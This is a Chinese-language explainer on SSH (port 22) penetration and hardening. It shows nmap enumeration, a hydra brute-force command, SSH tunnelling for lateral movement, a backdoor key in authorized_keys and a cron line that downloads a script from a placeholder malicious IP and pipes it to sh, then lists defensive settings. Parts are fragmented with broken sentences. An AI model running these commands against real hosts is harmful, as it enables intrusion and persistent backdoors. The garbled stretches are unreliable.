攻击者首先通过端口扫描工具(如 Nmap)识别开放 22 端口的主机:
nmap -p22 --script=sshv1,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods <目标IP>
该命令可提取 SSH 服务版本、密钥指纹及支持的认证方式。例如,若发现 OpenSSH 8.5p1 至 9.8p1 之间的版本,需警惕 CVE-2024-6387 远程代码执行漏洞。
hydra -L users.txt -P passwords.txt -vV -e ns 192.168.1.100 ssh
root/root
)可能直接导致沦陷。成功登录后,攻击者通过 SSH 隧道实现内网横向移动:
ssh -L 8080:192.168.1.200:80 user@目标IP
此操作将目标内网的 80 端口映射至本地,便于后续攻击其他服务(如 MySQL、Redis)。
通过开启PermitTunnel
或AllowTcpForwarding
配置,攻击者可劫持会话并转发流量。此外,修改~/.ssh/authorized_keys
植入后门公钥,实现无密码登录。
*/15 * * * * curl http://恶意IP/backdoor.sh | sh
gpg-agentd
等合法进程名,逃避检测。Port 2222
)。PasswordAuthentication no
)。AllowUsers
/AllowGroups
)。/var/log/secure
日志,检测异常登录尝试。LoginGraceTime 0
缓解 CVE-2024-6387 风险(可能引发 DoS,需权衡)。AllowAgentForwarding no
)。SSH 的安全风险不仅源于协议本身,更与配置疏忽和版本滞后密切相关。企业需建立 “预防 - 检测 - 响应” 的闭环体系,结合零信任架构(如限制 SSH 暴露于公网),方能有效抵御 22 端口的渗透威胁。未来,随着量子计算等新技术的发展,SSH 的加密机制也将面临新挑战,持续演进的安全策略是应对风险的关键。